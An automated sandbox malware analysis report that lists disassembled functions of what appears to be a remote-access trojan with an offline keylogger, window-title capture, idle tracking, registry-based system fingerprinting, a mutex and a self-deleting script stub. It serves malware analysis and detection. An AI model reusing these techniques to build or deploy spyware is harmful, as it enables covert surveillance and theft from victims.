                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                              • API String ID: 994465650-2151626615
                                              • Opcode ID: 7adcd97a12df77eb00c978c8fa497ed471b838c2edee9eb12bf68db0be483499
                                              • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                              • Opcode Fuzzy Hash: 7adcd97a12df77eb00c978c8fa497ed471b838c2edee9eb12bf68db0be483499
                                              • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                              Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 0040AD73
                                              • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                              • GetForegroundWindow.USER32 ref: 0040AD84
                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                              • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                              • String ID: [${ User has been idle for $ minutes }$]
                                              • API String ID: 911427763-3954389425
                                              • Opcode ID: 9c0ea1497b002db213ca3d4c258de7d47da5450525101b72f9826710761d16ec
                                              • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                              • Opcode Fuzzy Hash: 9c0ea1497b002db213ca3d4c258de7d47da5450525101b72f9826710761d16ec
                                              • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                              Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1178 40da6f-40da94 call 401f86 1181 40da9a 1178->1181 1182 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1178->1182 1184 40dae0-40dae7 call 41c048 1181->1184 1185 40daa1-40daa6 1181->1185 1186 40db93-40db98 1181->1186 1187 40dad6-40dadb 1181->1187 1188 40dba9 1181->1188 1189 40db9a-40db9f call 43c11f 1181->1189 1190 40daab-40dab9 call 41b645 call 401f13 1181->1190 1191 40dacc-40dad1 1181->1191 1192 40db8c-40db91 1181->1192 1203 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1182->1203 1204 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1184->1204 1205 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1184->1205 1194 40dbae-40dbb3 call 43c11f 1185->1194 1186->1194 1187->1194 1188->1194 1200 40dba4-40dba7 1189->1200 1213 40dabe 1190->1213 1191->1194 1192->1194 1206 40dbb4-40dbb9 call 409092 1194->1206 1200->1188 1200->1206 1214 40dac2-40dac7 call 401f09 1204->1214 1205->1213 1206->1182 1213->1214 1214->1182
                                              APIs
                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LongNamePath
                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                              • API String ID: 82841172-425784914
                                              • Opcode ID: 27b408779815cc004e99ecfd0e182e1062e96e4c42aa95a1860903710c88a7ad
                                              • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                              • Opcode Fuzzy Hash: 27b408779815cc004e99ecfd0e182e1062e96e4c42aa95a1860903710c88a7ad
                                              • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                              Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1342 41c482-41c493 1343 41c495-41c498 1342->1343 1344 41c4ab-41c4b2 1342->1344 1345 41c4a1-41c4a9 1343->1345 1346 41c49a-41c49f 1343->1346 1347 41c4b3-41c4cc CreateFileW 1344->1347 1345->1347 1346->1347 1348 41c4d2-41c4d7 1347->1348 1349 41c4ce-41c4d0 1347->1349 1351 41c4f2-41c503 WriteFile 1348->1351 1352 41c4d9-41c4e7 SetFilePointer 1348->1352 1350 41c510-41c515 1349->1350 1354 41c505 1351->1354 1355 41c507-41c50e CloseHandle 1351->1355 1352->1351 1353 41c4e9-41c4f0 CloseHandle 1352->1353 1353->1349 1354->1355 1355->1350
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                              • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                              • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreatePointerWrite
                                              • String ID: xpF
                                              • API String ID: 1852769593-354647465
                                              • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                              • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                              • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                              • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                              Function 0041B354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1356 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1367 41b3ad-41b3bc call 4135e1 1356->1367 1368 41b3ee-41b3f7 1356->1368 1373 41b3c1-41b3d8 call 401fab StrToIntA 1367->1373 1369 41b400 1368->1369 1370 41b3f9-41b3fe 1368->1370 1372 41b405-41b410 call 40537d 1369->1372 1370->1372 1378 41b3e6-41b3e9 call 401fd8 1373->1378 1379 41b3da-41b3e3 call 41cffa 1373->1379 1378->1368 1379->1378
                                              APIs
                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                              • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseCurrentOpenQueryValueWow64
                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 782494840-2070987746
                                              • Opcode ID: 8c19a994082f4321bdc384a8b48a1832129d6d8eaa349cc43c026258e8294c9e
                                              • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                              • Opcode Fuzzy Hash: 8c19a994082f4321bdc384a8b48a1832129d6d8eaa349cc43c026258e8294c9e
                                              • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                                              Function 00415B25 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 163COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountEventTick
                                              • String ID: !D@$,aF$NG
                                              • API String ID: 180926312-2771706352
                                              • Opcode ID: dc37ff7b83ee0ff2dc7662b81a42dc1c35a371564c17bc36c46a6b8711b8c7cb
                                              • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                              • Opcode Fuzzy Hash: dc37ff7b83ee0ff2dc7662b81a42dc1c35a371564c17bc36c46a6b8711b8c7cb
                                              • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                              Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1474 40a6b0-40a6c0 1475 40a6c6-40a6c8 1474->1475 1476 40a75d-40a760 1474->1476 1477 40a6cb-40a6f1 call 401f04 CreateFileW 1475->1477 1480 40a731 1477->1480 1481 40a6f3-40a701 GetFileSize 1477->1481 1482 40a734-40a738 1480->1482 1483 40a703 1481->1483 1484 40a728-40a72f CloseHandle 1481->1484 1482->1477 1485 40a73a-40a73d 1482->1485 1486 40a705-40a70b 1483->1486 1487 40a70d-40a714 1483->1487 1484->1482 1485->1476 1488 40a73f-40a746 1485->1488 1486->1484 1486->1487 1489 40a716-40a718 call 40b117 1487->1489 1490 40a71d-40a722 Sleep 1487->1490 1488->1476 1491 40a748-40a758 call 409097 call 40a1b4 1488->1491 1489->1490 1490->1484 1491->1476
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                              • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                              • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSizeSleep
                                              • String ID: XQG
                                              • API String ID: 1958988193-3606453820
                                              • Opcode ID: 28ce54e323a61a7c7e3df4bf156f69a9efcaf564c436a4257aa778de296e5956
                                              • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                              • Opcode Fuzzy Hash: 28ce54e323a61a7c7e3df4bf156f69a9efcaf564c436a4257aa778de296e5956
                                              • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                              Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTimewsprintf
                                              • String ID: Offline Keylogger Started
                                              • API String ID: 465354869-4114347211
                                              • Opcode ID: c7934c326ef2b1dcecdff176d04098d35d6efa8e09e0995c368ff86506386951
                                              • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                              • Opcode Fuzzy Hash: c7934c326ef2b1dcecdff176d04098d35d6efa8e09e0995c368ff86506386951
                                              • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                              Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                              • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                              • RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: pth_unenc
                                              • API String ID: 1818849710-4028850238
                                              • Opcode ID: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                              • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                              • Opcode Fuzzy Hash: 04dffd27395d5cb7a301fd27aaace46d1b2beb75a59ed872a5e7c8f8e25a915c
                                              • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                              Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 3360349984-0
                                              • Opcode ID: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                              • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                              • Opcode Fuzzy Hash: 9e0a8eaf4219b775e830663fcb54a959b6233ae16d1ef5de7dcca6256e783451
                                              • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                              Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                              • GetLastError.KERNEL32 ref: 0040D0BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateErrorLastMutex
                                              • String ID: hhh-AQVE0Z
                                              • API String ID: 1925916568-1725776610
                                              • Opcode ID: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                              • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                              • Opcode Fuzzy Hash: eabddf02165d7cb7ab60b975d5c9d75332e346c4e6257b5baf50d4a4f7034b19
                                              • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                              Function 004135E1 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                              • RegCloseKey.KERNEL32(?), ref: 0041362D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: e5c88bf4778b1a12960ae4c3b265923e79f6a7b3b3cce25859afcc872f091df0
                                              • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                              • Opcode Fuzzy Hash: e5c88bf4778b1a12960ae4c3b265923e79f6a7b3b3cce25859afcc872f091df0
                                              • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                              Function 00413733 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                              • RegCloseKey.KERNEL32(00000000), ref: 00413773
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                              • Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
                                              • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                              • Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94
                                              Function 0044F45D Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F461
                                              • _free.LIBCMT ref: 0044F49A
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
